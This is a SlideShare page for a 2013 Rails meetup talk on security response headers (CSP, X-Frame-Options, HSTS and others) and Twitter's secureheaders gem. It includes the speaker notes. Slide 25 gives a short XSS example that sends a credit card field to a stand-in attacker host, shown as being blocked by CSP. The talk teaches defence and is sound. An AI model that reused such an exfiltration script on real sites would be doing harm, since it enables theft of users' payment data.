2013: OC Rails Jan - SecureHeaders library and content security policy

1,929 views

Published on

Discusses the various security-related browser response headers and the benefits around them. Also introduces the secureheaders gem (https://github.com/twitter/secureheaders) which simplifies the application

Published in: Technology
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,929
On SlideShare
0
From Embeds
0
Number of Embeds
61
Actions
Shares
0
Downloads
16
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide
  • Hello AppSec USA. My name is Alex Smolen, this is Neil Matatall and this is Justin Collins. We're on Twitter's Product Security team and today we're going to talk to you about security automation at Twitter.
  • Talk about http basic authorization
  • Many of these headers not encourage best practices while providing a better user experience and saving resources
  • Take a survey
  • save resources since nothing is framed
  • Twitter has had clickjacking problems in the past. While xfo does not solve all clickjacking issues, it does solve a very common case and is generally a very quick win that is easy to integrate.
  • hsts preload and max-age
  • Explain how redirecting to https doesn’t protect the initial request Save round trip
  • Explain mixed content: MITM assets Firesheep Cookies sent Supported in webkit (phantomjs) accept arbitrary and safe because inserted scripts won’t execute on* events javascript uris restrict using eval
  • A report from one of our wonderful whitehat reporters gave us a drop of happiness when he said that a successful xss attempt had been thwarted by CSP. TRANSITION: we took stock of what headers were implemented on our properties, and we were not satisfied. They were applied inconsistently and a by a variety of one-off methods.
  • strings or hashes
  • Yeah, some browsers protect you, but not all support it
  • Content security policy defines what can "run" on a page and any deviation creates an alert. And Twitter was an early adopter. We saw that this could not only potentially protect our users, but give a large number of data points as to what the user is experiencing. We have used CSP to help detect XSS and mixed-content by leveraging the reports sent to us by the users' browsers. This compliments the static and dynamic analysis provided by brakeman and phantom-gang in a unique way as we are receiving information from the user. We send the CSP reports to a central scribe host (describe: massively scalable endpoint to collect and aggregate large amounts of data) which writes to hadoop file system which we can run "big data" reports against using pig/scalding. We send this information to SADB where we can search and sort more easily.
  • 2013: OC Rails Jan - SecureHeaders library and content security policy

    1. 1. B Not your typical Rails security talk Header use @ Twitter @ocrails January 30, 2013 @ocrails | @ndm
    2. 2. What are headers? @ocrails | @ndm
    3. 3. Wait, not those ones @ocrails | @ndm
    4. 4. OK, but what are browser headersAuthorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==Accept: text/plainContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101Firefox/12.0 @ocrails | @ndm
    5. 5. Response headersCache-Control: max-age=3600ETag: "737060cd8c284d8af7ad3082f209582d"Location: http://www.w3.org/pub/WWW/People.html @ocrails | @ndm
    6. 6. I’m already boredTime to get awesomer @ocrails | @ndm
    7. 7. Security headersLeverage the browser for security @ocrails | @ndm
    8. 8. Sweeeeet. I don’t have write secure code! @ocrails | @ndm
    9. 9. Time of convergence @ocrails | @ndm
    10. 10. Should you? @ocrails | @ndm
    11. 11. Do you use these?Content security policyX-Frame-OptionsHTTP Strict Transport SecurityX-Xss-ProtectionX-Content-Type-Options @ocrails | @ndm
    12. 12. X-ContentType-OptionsFixes mime sniffing attacksOnly applies to IE, because only IE woulddo something like thisX-Content-Type-Options = ‘nosniff’zzzzZZZZZZzzzzz @ocrails | @ndm
    13. 13. X-Xss-ProtectionUse the browser’s built in XSS AuditorX-Xss-Protection: [0-1](; mode=block)?X-Xss-Protection: 1; mode=block(SCREENSHOT OF BLOCKED SCRIPT)zzzzZZZ... huh? zzzzzzzz @ocrails | @ndm
    14. 14. X-Frame-OptionsProtects you from most classes ofClickjackingX-Frame-Options: DENYX-Frame-Options: SAMEORIGINX-Frame-Options: ALLOW FROMexample.comzzz... oh hey thats cool. Don’t frame my stuff. @ocrails | @ndm
    15. 15. X-Frame-Options @owaspoc Jan 2013 @ndm | @presidentbeef
    16. 16. Firesheep/SSL StripGiven I don’t haven’t received an HSTS headerAnd I have a sessionWhen I visit http://example.comThen I am pwned @ocrails | @ndm
    17. 17. Other ssl failsPosting passwords over HTTPLoading mixed contentUsing protocol relative URLS @ocrails | @ndm
    18. 18. Strict Transport Security @ocrails | @ndm
    19. 19. How hard is it to use?Base CaseStrict-transport-security: max-age=10000000Do all of your subdomains support SSL?Strict-transport-security: max-age=10000000; includeSubdomains(SSL FOR DUMMIES PICTURE) @ocrails | @ndm
    20. 20. Content secur-a-wat?Content security policy is reshaping the security modelIt is a complicated spec with great differences across browsersIt is not widely adoptedHowever,It completely eliminates reflected and stored XSSIt ensures that you never load mixed contentIt can protect users with infected browsersIt allows you to accept arbitrary html code from users @ocrails | @ndm
    21. 21. Wat? Sounds cool.x-webkit-csp:script-srcstyle-srcimg-srcdefault-srcframe-srcconnect-srcfont-srcmedia-srcobject-srcreport-uri | @ndm @ocrails
    22. 22. QuickTime™ and a H.264 decompressor are needed to see this picture.@owaspoc Jan 2013@ndm | @presidentbeef
    23. 23. Get rid of XSS, eh?A script-src directive that doesn’t contain ‘unsafe-inline’ almosteliminates most forms of cross site scripting.I WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPT @ocrails | @ndm
    24. 24. @owaspoc Jan 2013@ndm | @presidentbeef
    25. 25. But I have to...OK, then I’ll inject:<script> var image = new Image(); image.src = “cyberhacker.com/steal?data=”+ $(‘#credit_card’).val();</script>FALSE! img-src violation, no XHR allowed @owaspoc Jan 2013 @ndm | @presidentbeef
    26. 26. Inline css too? WTF? @ocrails | @ndm
    27. 27. Choose your own adventure @ocrails | @ndm
    28. 28. Apply all the headers! @ocrails | @ndm
    29. 29. How to apply?Secure headers!Open sourced earlier this monthhttps://github.com/twitter/secureheaders @ocrails | @ndm
    30. 30. How does it work?It sets a before_filter that applies each headerValues are based on options passed to filter, or in an initializerEasily overriddenSecure by default!!! @ocrails | @ndm
    31. 31. What about that security policy thingyThere are > 6 differences between these two header values @ocrails | @ndm
    32. 32. Yay for standards @ocrails | @ndm
    33. 33. Long hair don’t careAbout browser inconsistencies @ocrails | @ndm
    34. 34. Other featuresSet separate policies for http/httpsAutofill chrome-extension: (becoming part of spec)Auto fill missing directives with default value (becoming part of the spec) @ocrails | @ndm
    35. 35. You mean there’s more on CSP?The browser sends reports! @ocrails | @ndm
    36. 36. What does the report look like?{ "csp-report"=> { "document-uri"=>"http://localhost:3000/home", "referrer"=>"", "blocked-uri"=>"ws://localhost:35729/livereload", "violated-directive"=>"xhr-src ws://localhost.twitter.com:*" }} @ocrails | @ndm
    37. 37. Quiz: what does this report indicate?{ "csp-report"=> { "document-uri"=>"http://example.com/welcome", "referrer"=>"", "blocked-uri"=>"self", "violated-directive"=>"inline script base restriction", "source-file"=>"http://example.com/welcome", "script-sample"=>"alert(1)", "line-number"=>81 }} @ocrails | @ndm
    38. 38. Header gem to the rescueIt forwards CSP reports for FirefoxIt makes setting an enforce and report only mode easy forexperimentation @ocrails | @ndm
    39. 39. Monitor and Tune ALL the things @ocrails | @ndm
    40. 40. Splunk @ocrails | @ndm
    41. 41. Trending and anomalies @ocrails | @ndm
    42. 42. CSP Phantom Gang ThreatDeck Brakeman Roshambo Email Email developers security@owaspoc Jan 2013@ndm | @presidentbeef
    43. 43. Who wants to buy me a beer? @ocrails | @ndm

    ×